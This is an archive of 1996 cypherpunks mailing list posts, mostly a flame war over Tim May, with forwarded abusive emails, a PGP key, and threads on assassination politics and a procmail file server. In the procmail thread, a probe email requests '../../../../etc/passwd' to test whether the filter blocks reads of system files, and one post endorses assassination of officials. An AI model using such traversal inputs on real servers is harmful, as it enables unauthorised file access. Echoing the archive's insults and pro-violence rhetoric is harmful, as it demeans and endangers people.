+0800 Subject: Snake-Oil FAQ In-Reply-To: Message-ID: <199609220854.DAA27487@mailhub.amaranth.com> In , on 09/21/96 at 04:47 PM, Lance Cottrell said: >I am setting up just such a list. I plan to award products for both >excellent and lousy crypto. This really should be a committee (yuch) >effort, so if you would like to participate, please let me know. I would be intrested in this. I would like to see the following information made available for any product that made it on to the list: Detailed listings of pro/cons of the product. Contact with the authors & listing of any rebutials they may have for the cons. A appendix to the list explaining why the individule points are a pro or a con for crypto products. -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- From whgiii at amaranth.com Sun Sep 22 06:06:14 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Sun, 22 Sep 1996 21:06:14 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: <199609220708.AAA20288@dfw-ix2.ix.netcom.com> Message-ID: <199609221056.FAA27889@mailhub.amaranth.com> In <199609220708.AAA20288 at dfw-ix2.ix.netcom.com>, on 09/22/96 at 12:09 AM, Bill Stewart said: >>If it could the US would have assasinated Saddam by now. It can't because it >>is too difficult to find out where exactly a person will be. >It's perfectly doable, it's just not politically expedient. >One reason is that if they kill Saddam, they no longer have an >excuse to keep threatening and attacking Iraq and making themselves look good. >Another is that National Leaders have a tacit understanding between themselves never >to assassinate other politicians [well, hardly ever....] If you break the taboo, >you're implicitly inviting everyone else >to go gunning for you, and it's too easy to do if there are enough >people who really want you dead, especially well-organized people >like a foreign army or spy service. >If the US _had_ really wanted to assassinate Saddam, they could have >hired professionals to do the job (like Mossad.) Instead they >killed 200,000 other Iraqis, including civilians, draftees, and a >few tens of thousands of real soldiers. You need to take into account the politics of the region. With Saddam gone you have created a power vaccume that Iran would be all to happy to fill. It was for this reason that durring the Gulf War the US & its allias (European & Arab) did not go to Bagdad. They mearly wanted to knock Saddam down a notch or two not take him out. I will agree with you about the taboo on political assassinations. Even the Mossad are not involved in assassination of government leaders (they keep such actions to rather nasty terrorist). The assassinations of government leaders that have taken place in the region have all been from citizens of their own country. -- ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info ----------------------------------------------------------- From aba at dcs.ex.ac.uk Sun Sep 22 06:29:28 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sun, 22 Sep 1996 21:29:28 +0800 Subject: Timmy May's spam (Was: Re: CIA hacked) In-Reply-To: Message-ID: <199609220707.IAA00335@server.test.net> Dimitri Vulis writes: > You're right - the forwarding mechanism I've been using so far just yanks in > the spam e-mail without any processing. I will henceforth > 1) Put the words 'Tim', 'May', and 'spam' in the subject line Guess that will help people kill file on that combination, rather than on dlv at bwalk, which I suspect some may have done at this stage, and hence not see the [NEWS] series, and any signal posts. > > It would seem to me that the first insults were thrown by yourself, > > and that your strange habit of bouncing all the fallout to the list is > > perpetuating the problem. > > No. Let me remind you the sequence of events, in chronological order: > > 1. Timmy May (who picked up a few popular PKC buzzwords, doesn't know > anything about crypto, and isn't interested in learning) started spamming > this mailing list with political rants I don't think this at all fair; if you've read his cyphernomicon, you will see that he has a perfectly good understanding of crypto. His strong point as I see it however, is that he was one of the first to think deeply about the implications of strong crypto, and document this in a fairly comprehensive manner. This is a central topic for cypherpunks, after all: cypherpunks are trying to achieve poltical ends via strong crypto, crypto isn't being discussed in isolation, as a purely scientific endeavour. sci.crypt with its charter is more this. Also, I would point out that you yourself don't restrict yourself to purely crypto discussions (aside from this latest war), you for instance recently discussed driving licenses in NY. Not that I am complaining, or think this is especially inappropriate, as the topic of Chaumian credentials, and the current state of state mandated credentials I consider on topic, but you are criticizing others for analysing politics. The [NEWS] series, also (I've already said I consider these useful), are hardly pure discussion of crypto, if this were your only concern. > 2. Most people who used to discuss crypto work on this mailing list > have unsubscribed. True, and unfortunate. coderpunks feels somewhat reminiscent of how cypherpunks used to be in this regard, try subscribing to that, if you are uninterested in political aspects, and have not already. I subscribe to both, because I think politics is also important, as well as churning out code, and just read very selectively on cypherpunks. > 3. I pointed out a few examples of Tim making factually bogus claims in > his rants. > > 4. Tim got very angry at me and started flaming me. I ignored him. > > 5. Tim posted a series of rants about me, attributing to me various > nonsense I never said. I pointed out once that I never said it and > then ignored him. I wasn't paying attention when these alleged events took place, so I can't really comment. I was commenting more on the fallout. > 6. Recently it came to my attention that Tim's been contacting off-list > various people in the computer security field and "complaining" about > the politically incorrect things that I supposedly say on the Internet > - except that he made up most of the "things" he complained about. I don't think it's near as serious as you are worrying about, all I heard him say was something about not understanding the motive for the (spit) stuff. Hardly complaining, more a passing comment on your posting style than a complaint of "political incorrectness". > 7. At this point I pointed out quite publicly that he's a liar. > > 8. Since that time, several friends of Tim May (or maybe Tim himself, > using multiple accounts) have been sending me harrassing e-mail, often > by quoting my own cypherpunks articles and adding an obscenity. It appears that Chris Adams started this. And others confused by the quoting, presumed it was you. (Especially since the headers were yours, as you were forwarding them.) Also the fact that you were forwarding these emails probably would get you complaints anyway, even if the quoting had made it clear what was going on. > 9. Tim himself continues flaming me and telling lies about me (see his > recent rant with the subject "death threats"). I guess you mean the purely fictitious Valdimir G Nulis :-) A cross between Vladimir Z Nuri (who many consider to be Detweiller) and yourself. I don't really see what you're complaining about: it's really oblique, and tame compared to your recent perfectly direct, and somewhat crude insults to Tim. > And you see, Timmy May is an obsessive liar and a vindictive nutcase. I don't see the liar, nor the nutcase. I haven't noticed him say anything which I considered untrue, nor have any of his posts appeared nutty. > > If reporting to the list is accurate, I hear you have a PhD with a > > subject related to crypto, so presumably you would have ample > > knowledge to contribute technical crypto related thoughts. I'm sure > > people would be interested in anything along those lines you cared to > > contribute, and your reputation would benefit, > > I still hope to be able discuss crypto on this mailing list (yes, my Ph.D. > thesis was about crypto), but I see two problems: > > 1. A lot of people have already left this list, unwilling to be subjected > to Tim May's rants, lies, and personal attacks. If I post something crypto- > relevant to this mailing list, they won't see it. The decision to keep the list open was made for reasons I agree with, censoring people is not the way to promote open discussions. Censoring people is something cypherpunks are strongly against in other forums, so it would seem especially hypocritical for cypherpunks to censor the list itself. However the result isn't too pretty either. But the only solution is to just post signal. Getting into what is turning into a spam bot war doesn't solve a thing! > 2. Here's an example of the net-abuse being perpetrated by Tim May and his > merry gang of mailbombers. I posted some crypto-relevant wire clippings > to this mailing list. Either Tim (using an alternate account) or some pal > of his e-mailed it back to me with an obscenity appended. > > ]From adamsc at io-online.com Thu Sep 19 00:00:57 1996 ^^^^^^^^^^^^^^^^^^^^ why is this in part of your own headers? > ]Received: by bwalk.dm.com (1.65/waf) > ] via UUCP; Thu, 19 Sep 96 00:49:21 EDT > ]From: Troy Varange and this too? Is this as a result of threading, or are you quoting part of another message? Or is it a forgery? > ]Subject: Re: [NEWS] Crypto-relevant wire clippings > ]> [...] > ]> CIA-backed rebels in Nicaragua played in bringing crack cocaine and > ]> weapons to Los Angeles and other cities. > ]> > ]> Bachus told Waters the hearing wasn't motivated by politics and that he > ]> > ]> --- > ]> > ]> Dr.Dimitri Vulis KOTM > ]Fuckhead. If it is more widespread than those two, perhaps you are being Detweilled? He seems to enjoy that sort of thing. > Is this any more readable? See, I put a ']' in front of the quoted material. Yeah, great! Only one more thing, use ellipses [...] to show large volumes of stuff which isn't relevant to your current point, and your quoting style is A1. (eg most of the body of your quoted [NEWS] item for the purposes of this discussion could have been ellipsed out). Some friendly advice for you if you care to take it: if you care about your reputation, I'd recommend dropping the Tim May is a liar, and the crude insults, that should halt the recent drop in your reputation. If you feel you have a legitimate complaint, you make your case better by avoiding insults. Also once things die down, or sooner (I'd prefer sooner for the sake of my per second BT phone line charges :-), stop forwarding any email to cypherpunks, and you're ready for some serious crypto discussion. The email forwarding is what seems to have caused most complaints. People do pay attention when positive contributions are made, for instance I think I remember that you posted some time ago a way to have two plausible decryptions for one cyphertext, to enable things like duress keys, in terms of RSA. The problem with this, however is that RSA is currently very slow to use in its pure form for messages. Adam -- #!/bin/perl -sp0777i Message-ID: On Sun, 22 Sep 1996, Dale Thorn wrote: > in the U.S., that govt. is your agent, carrying out your > representatives' instructions, and paid with your tax dollars. Unless Er, the US is a winner takes all election, in which the candidate with the most votes,may still haveless than 50% of the viotes cast ---which is usually the case. > and until this becomes a literal dictatorship (and there is a valid De Jure, the US is a military dicatorship. << That the enabling legislation is hardly in forceis another matter, entirely. >> > argument that it applies even then), you are responsible for whatever > your paid agents do, from the street cop to the top politico. That being the case, then AP is the only way to effectively vote against them. Which probably would be a _very good_ thing. None of those paid agents have any legitimate functions. xan jonathon grafolog at netcom.com In the fight against terrorism, let us remember the biggest terrorist of the all --- the united states of america, which exports more death, destruction and mayhem that the rest of the world combined. From adam at homeport.org Sun Sep 22 09:49:24 1996 From: adam at homeport.org (Adam Shostack) Date: Mon, 23 Sep 1996 00:49:24 +0800 Subject: How to use procmail In-Reply-To: <199609220423.XAA00811@manifold.algebra.com> Message-ID: <199609221455.JAA15169@homeport.org> Igor Chudov @ home wrote: | Adam Shostack wrote: | > :0 | > * From bal at swissnet.ai.mit.edu | > { | > :0E | > | pgp +batchmode -fka | | Isn't this vulnerable to "deadbeef" attacks? I can also see an attack when | someone sends you an email with the spooofed "From " address and a user | name that is the same (or almost the same) as that of your trusted parties. | Then I can send you a bogus email containing a key for mrx at bogus.com | and next time you encrypt something for your friend nrx at provider.com, | you will actually encrypt it with the wron key. If I intercept your | email, your message to mrx can be compromised. Yes its vulnerable. I might see it in the logs, but I've personally verified most of the keys I care about, and they carry my signature, at least on my local keyring. | > # basic file server. Only sends whats in .outbound | > :0 | > * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$ | > * !^Subject:.*[ /.]\. | > * !^FROM_DAEMON | > { | > # FILE=`formail -x Subject: | sed 's/.* //'` | > FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'` | > | > :0c | > | (formail -rt -A"Precedence: junk";\ | > cat $HOME/.outbound/$FILE) | $SENDMAIL -t | | *If* .outbound has some subdirectories (say subdir), How about this email: | | From: dumbass at aol.com | Subject: GET subdir/../../../../etc/passwd | Reply-To: blin at algebra.com That will fail in the second subject line: * !^Subject:.*[ /.]\. Subject: does not match '/' or '.' followed by '.' The first Subject: line prevents absolute pathnames. * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$ So, AFAIK, you can't get anything but real subdirectories. Feel free to install it on localhost & experiment. I was pretty careful when I wrote it to make it safe. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dlv at bwalk.dm.com Sun Sep 22 10:04:52 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 23 Sep 1996 01:04:52 +0800 Subject: Timmy May's spam (Was: Re: CIA hacked) In-Reply-To: <199609220707.IAA00335@server.test.net> Message-ID: Adam Back writes: > > > It would seem to me that the first insults were thrown by yourself, > > > and that your strange habit of bouncing all the fallout to the list is > > > perpetuating the problem. > > > > No. Let me remind you the sequence of events, in chronological order: > > > > 1. Timmy May (who picked up a few popular PKC buzzwords, doesn't know > > anything about crypto, and isn't interested in learning) started spamming > > this mailing list with political rants > > I don't think this at all fair; if you've read his cyphernomicon, you > will see that he has a perfectly good understanding of crypto. His On the contrary. Timmy has only a passable understanding of some aspects of public-key crypto. He knows nothing about symmetric crypto and conventional attacks. He even argued that practitioners don't need to learn any crypto outside of PKC. (One of the things I don't like about Americans in their propensity to take pride in their ignorance and lack of education. :-) > strong point as I see it however, is that he was one of the first to > think deeply about the implications of strong crypto, and document > this in a fairly comprehensive manner. This is a central topic for > cypherpunks, after all: cypherpunks are trying to achieve poltical > ends via strong crypto, crypto isn't being discussed in isolation, as > a purely scientific endeavour. sci.crypt with its charter is more > this. > > Also, I would point out that you yourself don't restrict yourself to > purely crypto discussions (aside from this latest war), you for > instance recently discussed driving licenses in NY. Not that I am Right - the discussion of drivers licences and other credentials is definitely crypto-relevant. The discussion, e.g., of the ethics of mandatory insurance is not. My notion of crypto-relevance is fairly broad. E.g. I find the assassination politics discussion to be crypto-relevant and sometimes very interesting, and I kicked the ass of Alan Olsen and a few other assholes who tried to suppress it. I am very much interesting not only in the technical discussion of crypto, but also in the implication of its use, which would be off-topic for sci.crypt (fwiw). There's a difference between discussing privacy and ranting about unfair taxation of rich old farts like Timmy May. > complaining, or think this is especially inappropriate, as the topic > of Chaumian credentials, and the current state of state mandated > credentials I consider on topic, but you are criticizing others for > analysing politics. The [NEWS] series, also (I've already said I > consider these useful), are hardly pure discussion of crypto, if this > were your only concern. Really? I was trying to pull out only the stories which obvious crypto relevance. I'd be curious to know some examples of what in these series you consider not to be crypto-relevant. Perhaps I made a mistake somewhere. In particular, I consider _any discussion of electronic cash or money laundering to be crypto-relevant. > > 2. Most people who used to discuss crypto work on this mailing list > > have unsubscribed. > > True, and unfortunate. coderpunks feels somewhat reminiscent of how > cypherpunks used to be in this regard, try subscribing to that, if you > are uninterested in political aspects, and have not already. I > subscribe to both, because I think politics is also important, as well > as churning out code, and just read very selectively on cypherpunks. I have been subscribed to coderpunks almost since its beginning. It has some interesting discussion. Unfortunately most of the folks who left the original cypherpunks have not re-subscribed to coderpunks. > > 6. Recently it came to my attention that Tim's been contacting off-list > > various people in the computer security field and "complaining" about > > the politically incorrect things that I supposedly say on the Internet > > - except that he made up most of the "things" he complained about. > > I don't think it's near as serious as you are worrying about, all I > heard him say was something about not understanding the motive for the > (spit) stuff. Hardly complaining, more a passing comment on your > posting style than a complaint of "political incorrectness". I'm not "worried", since Timmy May has already earned the reputation of a nutcase and a liar in these circles, and is hardly in a position to "assassinate" anyone's character. However I am somewhat angry that several people I respect approached me in a short period of time and said something to the effect, "You know, Timmy May's been complaining to me about what you write on the Internet." Subsequent investigation revealed that he's been complaining not even about the things I did say (plenty of which are "politically incorrect"), but about things Timmy May himself made up - see quotes below. > > 8. Since that time, several friends of Tim May (or maybe Tim himself, > > using multiple accounts) have been sending me harrassing e-mail, often > > by quoting my own cypherpunks articles and adding an obscenity. > > It appears that Chris Adams started this. And > others confused by the quoting, presumed it was you. (Especially > since the headers were yours, as you were forwarding them.) Also the > fact that you were forwarding these emails probably would get you > complaints anyway, even if the quoting had made it clear what was > going on. How do you know that "Chris Adams" is a real person separate from Timmy? I rather doubt that someone other than Timmy himself would go into trouble "defending" Timmy, let alone three separate people. > > 9. Tim himself continues flaming me and telling lies about me (see his > > recent rant with the subject "death threats"). > > I guess you mean the purely fictitious Valdimir G Nulis :-) A cross > between Vladimir Z Nuri (who many consider to be Detweiller) and > yourself. I've corresponded with L.D. and he's a very bright and knowledgeable person. Timmy May lies when he claims that VZNuri (who's an idiot) could possibly be his "tentacle". You really should get to know L.D. better before you repeat the lies Timmy May spreads about him. > I don't really see what you're complaining about: it's really oblique, > and tame compared to your recent perfectly direct, and somewhat crude > insults to Tim. > > > And you see, Timmy May is an obsessive liar and a vindictive nutcase. > > I don't see the liar, nor the nutcase. I haven't noticed him say > anything which I considered untrue, nor have any of his posts appeared > nutty. I suspect that you haven't been following this discussion for long. Here's a recent quote from myself: ]Despite the name, there's practically no crypto discussions on the list. A few ]weeks ago someone mentioned elliptic curves, and there was an outcry of how ]it's "off-topic". Instead the mailing list is flooded with rants and personal ]attacks from Tim May, who knows next to nothing about cryptography, and whose ]long-winded diatribes in support of child pornography, drugs, and Harry Browne ]have absolutely no crypto relevance. Tim's off-topic spews have driven Eric ]Hughes, John Gilmore, Rich Salz, and many other former valuable contributors ]off the mailing list. Today's Cypherpunks don't write code - they write lies ]and personal attacks. I'll quote a couple of Tim May's unprovoked personal ]attacks against me to illustrate the kind of traffic found on the Cypherpunks ]mailing list (as opposed to cryptography discussions): ] ]>Message-Id: ]>To: ichudov at algebra.com (Igor Chudov) ]>From: tcmay at got.net (Timothy C. May) ]>Subject: Lying Purebred Sovok Tchurkas Write the History of the Net ]>Cc: cypherpunks at toad.com ]> ]>At 4:17 AM 7/18/96, Igor Chudov @ home wrote: ]> ]>>Knowing KGB habits as pertaining to releasing information to the public, ]>>I would expect 50% of the CDROM to be pure bullshit, 40% -- lies, and ]>>maybe 10% truth that was already publicly available. ]>> ]>>It is like buying a CDROM about the history of the Net from Dr. Grubor. ]>>Maybe it would be interesting and amusing, but not worth $120. ]> ]>NOW you tell me! I just shelled out $42 for "The History of the Net," by ]>Dr. John Grubor and Dr. Dmitri Vulis, 1996. ]> ]>And here I thought it was the real history of the Net, especially the part ]>about how "the dandruff-covered Peter Vorobieff (spit) conspired with the ]>purebred Sovok Valery Fabrikant (spit) to spread the lies of the Jew ]>cripples dying of AIDS in Sovok-controlled clinics." ]> ]>When Grubor and Vulis speak of the Usenet Cabal being a Sovok (spit) plot, ]>I thought this was the actual truth. I guess not. Maybe Spafford is ]>actually Rabbi Ruthenberg. ]> ]>--Tim May ]> ]>(hint: this a satire, based on the writings of Vulis, who speaks of people ]>as "lying purebred Sovok Tchurkas" (whatever _they_ are), and attaches the ]>charming word "(spit)" after nearly every person he references.) ] ]I responded to Tom May stating that I've never called anybody a (t)churka (I'm ]not even quite sure who or what they are) and asked him to retract his false ]claims. Tim May never retracted, but continued to post more lies about me and ]to attribute to me various nonsense I never wrote. But Tim May's attempts at ]"character assassination" don't stop at the cypherpunks mailing list: recently ]three separate people whom I respect (unlike Tim May) and who work in the ]computer security field told me that Tim May has been complaining to them ]"off-list" about my submissions to the Cypherpunks mailing list. ] ]Here's another recent example of a personal attack Tim May posted to the list: ] ]>Message-Id: ]>Mime-Version: 1.0 ]>Content-Type: text/plain; charset="us-ascii" ]>To: cypherpunks at toad.com ]>From: tcmay at got.net (Timothy C. May) ]>Subject: Reputation Systems in Action ]>Sender: owner-cypherpunks at toad.com ]>Precedence: bulk ]> ]>At 6:41 PM 9/11/96, paul at fatmans.demon.co.uk wrote: ]>>> tcmay at got.net (Timothy C. May) writes: ]>>> > As to "tasteless and insulting," a matter of personal perspective. I find ]>>> > it helpful to call a spade a spade, and others apparently do as well. ]>>> > ]>>> ]>>> Of course, Tim gets very uncomfortable when others call a spade a spade. ]>> ]>> ]>>This constant character assasination of Tim is getting rather boring, ]>>as far as I can see, and I read all of the posts on the list, he has ]>>done nothing more than ignore posts from these idiots, that is his ]>>choice and nothing to do with anyone else. ]> ]>But this latest episode illustrates the role of reputations. Namely, my own ]>reputation is not being harmed by bizarre commentaries from the Vulis-bot. ]>As its reputation is (apparently) pretty low, and associated with Serdar ]>Ardic-style rants about "sovoks," "the cabal," and "spit," such an entity ]>can hardly "assassinate" my character. ] ]Again, Tim May is lying. I am not interested in "assassinating" his character. ]He is the one spreading lies about me and attributing to me various nonsense I ]never said. Tim May shows his true colors when he faults me for my defense of ]Serdar Argic's freedom of speech. Unfortunately, Serdar has been silent for ]over two years, but that doesn't stop censorous liars like Tim May from ]continuing their vendetta against those who defended free speech. ] ]>A few years ago Larry Detweiler, aka "vznuri" ("visionary"), aka "S.Boxx," ]>aka "Pablo Escobar," aka several other alternate personalities, wrote ]>dozens of screeds denouncing me, Eric Hughes, Nick Szabo, Hal Finney, etc. ]>Did this have an effect on our reputations? Not to people I respected, of ]>course. And if Detweiler's rants affected my reputation with his peers, ]>including Dimitri Vulis, Ludwig Plutonium, Doctress Neutopia, Serdar Argic, ]>well, this is to the good. ] ]We keep catching Tim May in major lies: ] ]1. Tim May attributes to me things I never said. ] ]2. Tim May was caught lying about Kelly Goen. ] ]3. Tim May is lying about Detweiler. As far as I know, Detweiler never had any ]problems with Eric Hughes et al, and Hughes doesn't have a problem with ]Detweiler. The only person Detweiler has a problem with is Tim May. Detweiler ]is 100% correct in saying that Tim May is an ignorant liar and a crook. ] ]4. Sovok VZNuri is not Detweiler - even Tim May doesn't believe his own lies. ] ]5. Archimedes (former Ludwig) Plutonium and Doctress Libby Neutopia know a lot ]more about cryptography and are far more truthful than Timothy C. May. ] ]>In the mathematics of reputations, a negative reputation held by one whose ]>own reputation is negative is a positive. ] ]_If it's true, then my reputation benefits from being slandered by the proven ]liar Tim May. Does this answer your questions about Timmy May's veracity? > > > If reporting to the list is accurate, I hear you have a PhD with a > > > subject related to crypto, so presumably you would have ample > > > knowledge to contribute technical crypto related thoughts. I'm sure > > > people would be interested in anything along those lines you cared to > > > contribute, and your reputation would benefit, > > > > I still hope to be able discuss crypto on this mailing list (yes, my Ph.D. > > thesis was about crypto), but I see two problems: > > > > 1. A lot of people have already left this list, unwilling to be subjected > > to Tim May's rants, lies, and personal attacks. If I post something crypto- > > relevant to this mailing list, they won't see it. > > The decision to keep the list open was made for reasons I agree with, > censoring people is not the way to promote open discussions. > Censoring people is something cypherpunks are strongly against in > other forums, so it would seem especially hypocritical for cypherpunks > to censor the list itself. No more hypocritical than to have a "cypherpunks meetings" with specific persons excluded because someone doesn't like their political views. Here's a threat I found in our 'orphan' mailbox: ]From paul at fatmans.demon.co.uk Thu Sep 19 23:39:14 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Fri, 20 Sep 96 01:23:58 EDT ] for paul at fatmans.demon.co.uk ]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA02597 for dvl at bwalk.dm.com; Thu, 19 Sep 96 23:39:14 -0400 ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ah16490; ] 19 Sep 96 17:22 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa18174; 19 Sep 96 17:06 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843059897 ; Wed, 18 Sep 96 15:18:17 +0000 ]Comments: Authenticated sender is ]From: paul at fatmans.demon.co.uk ]To: dvl at bwalk.dm.com ]Date: Wed, 18 Sep 1996 15:18:16 +0000 ]Mime-Version: 1.0 ]Content-Type: text/plain; charset=US-ASCII ]Content-Transfer-Encoding: 7BIT ]Subject: Re: A daily warning regarding Timothy C. May ]Priority: normal ]X-Mailer: Pegasus Mail for Windows (v2.31) ]Message-Id: <843149202.18174.0 at fatmans.demon.co.uk> ] ] ]> Timothy C. May is a lying sack of shit. ] ]Look, that is enough, I`m going to move to have you removed from the ]list if you keep this up... get a life fuckhead, if you are going to ]flame at least do it from your real address so people can killfile ]you, or maybe you believe censorship is better? ] ] ] ] Datacomms Technologies web authoring and data security ] Paul Bradley, Paul at fatmans.demon.co.uk ] Http://www.fatmans.demon.co.uk/crypt/ ] "Don`t forget to mount a scratch monkey" ] ]-----BEGIN PGP PUBLIC KEY BLOCK----- ]Version: 2.6.3ia ] ]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 ]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 ]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR ]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy ]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP ]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b ]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k ]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ ]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 ]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 ]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp ]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW ]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi ]mUqFH41Z7NkyO8ZFdi5GGX0= ]=CMZA ]-----END PGP PUBLIC KEY BLOCK----- (The idiot misspelled 'dvl' for 'dlv'.) Who could possibly be in the position to threaten to "remove" people from this mailing list? (Hint: he rants a lot.) > > 2. Here's an example of the net-abuse being perpetrated by Tim May and his > > merry gang of mailbombers. I posted some crypto-relevant wire clippings > > to this mailing list. Either Tim (using an alternate account) or some pal > > of his e-mailed it back to me with an obscenity appended. > > > > ]From adamsc at io-online.com Thu Sep 19 00:00:57 1996 > ^^^^^^^^^^^^^^^^^^^^ > why is this in part of your own headers? > > > ]Received: by bwalk.dm.com (1.65/waf) > > ] via UUCP; Thu, 19 Sep 96 00:49:21 EDT > > ]From: Troy Varange > > and this too? Is this as a result of threading, or are you quoting > part of another message? Or is it a forgery? I've _apparently received similar e-mail spam from the following addresses: varange at crl.com paul at fatmans.demon.co.uk adamsc at io-online.com The most recent incident involved about 20 identical mailbombs from the latter one. Obviously no one can tell whether they're forged or whether the e-mail really came from these addresses. I suspect that there's just one person behind these very similar attacks, and that this person also posts stupid rants from got.net. You probably weren't around when Timmy May waged a flame war against L.D. which involved Timmy setting up a legion of "artificial persons" designed to show massive support for Timmy's side. This is nothing new. > > ]Subject: Re: [NEWS] Crypto-relevant wire clippings > > ]> [...] > > ]> CIA-backed rebels in Nicaragua played in bringing crack cocaine and > > ]> weapons to Los Angeles and other cities. > > ]> > > ]> Bachus told Waters the hearing wasn't motivated by politics and that he > > ]> > > ]> --- > > ]> > > ]> Dr.Dimitri Vulis KOTM > > ]Fuckhead. > > If it is more widespread than those two, perhaps you are being > Detweilled? He seems to enjoy that sort of thing. Timmy May seems to enjoy thi sort of thing since he has no life and too much free time on his hands. L.D. is a perfectly reasonable guy and he'd never do such a thing to me. However I doubt that there are so many distinct people involved in mailbombing me. > People do pay attention when positive contributions are made, for > instance I think I remember that you posted some time ago a way to > have two plausible decryptions for one cyphertext, to enable things > like duress keys, in terms of RSA. The problem with this, however is > that RSA is currently very slow to use in its pure form for messages. I don't recall this one... My feeling about RSA is that one of these days there will be a breakthrough allowing much faster factorization (either through a better algorithm on a conventional computer, or by a practical quantum computer) and then all the codes based on factorization will become essentially plaintext. It's time to start looking for other hard problem to base PKC on. E.g., does anyone know of any progress made on public-key cryptosystems based on the word problem in semigroups, described in Neal Wagner and Marianne Magyarik, _A public key cryptosystem based on the word problem_, Advances in Cryptology: Proceedings of Crypto '84, G. R. Blakley and D. Chaum, eds., Lecture Notes in Computer Sciences #196, Springer Verlag, 1985, and also mentioned in Wayne Patterson, _Mathematical Cryptology for Computer Scientists and Mathematicians_, Rowman and Littlefield, 1987? >From what I neard, NSA tried very hard to implement it and failed, and the Soviets actually built a cryptosystem similar to what they described. I tried to duplicate what the Soviets supposedly did, but without success. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jya at pipeline.com Sun Sep 22 10:22:10 1996 From: jya at pipeline.com (John Young) Date: Mon, 23 Sep 1996 01:22:10 +0800 Subject: WEB_spy Message-ID: <199609221448.OAA22284@pipe2.ny3.usa.pipeline.com> 9-22-96. WaPo: "In California, Creating a Web of the Past" Brewster Kahle's massive data-collection devices and programmed computers are surfing and saving everything they can find on the global computer network. At the end of this year that then will be updated as fast as his computers can do their vacuum cleaning, likely every few months. But the project also has piqued the interest of privacy rights advocates and copyright lawyers, who question how the archive will use its data. "I'm dealing with every single intellectual property issue out there," Kahle said. "Privacy, copyright, pornography, import-export -- we've got it all." He is forming a for-profit venture that will sell the Web searching and storing technology developed at the archives. Researchers from AT&T Corp. and Xerox Corp. have asked to study the archive. ----- http://jya.com/webspy.txt (7 kb) WEB_spy From dlv at bwalk.dm.com Sun Sep 22 11:00:23 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 23 Sep 1996 02:00:23 +0800 Subject: Continuing spam from Timmy May (or one of his clones) Message-ID: Here's today's sample. I'm becoming more convinced that it's Timmy May him/her/ itself, since he/she/it complains about being called Timmy. Can someone please take a look at the headers and see if they appear to be forged from got.net? ]From paul at fatmans.demon.co.uk Sun Sep 22 10:59:25 1996 ]Received: by bwalk.dm.com (1.65/waf) ] via UUCP; Sun, 22 Sep 96 11:03:58 EDT ] for dlv ]Received: from uumx.smtp.psi.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; ] id AA19743 for dlv at bwalk.dm.com; Sun, 22 Sep 96 10:59:25 -0400 ]Received: from relay-2.mail.demon.net by uumx.smtp.psi.net (8.6.12/SMI-4.1.3-PSI) ] id KAA19486; Sun, 22 Sep 1996 10:59:00 -0400 ]From: paul at fatmans.demon.co.uk ]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net id ac22319; ] 22 Sep 96 15:23 BST ]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net ] id aa17044; 22 Sep 96 15:19 BST ]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP ] id AA843329591 ; Sat, 21 Sep 96 18:13:11 +0000 ]Comments: 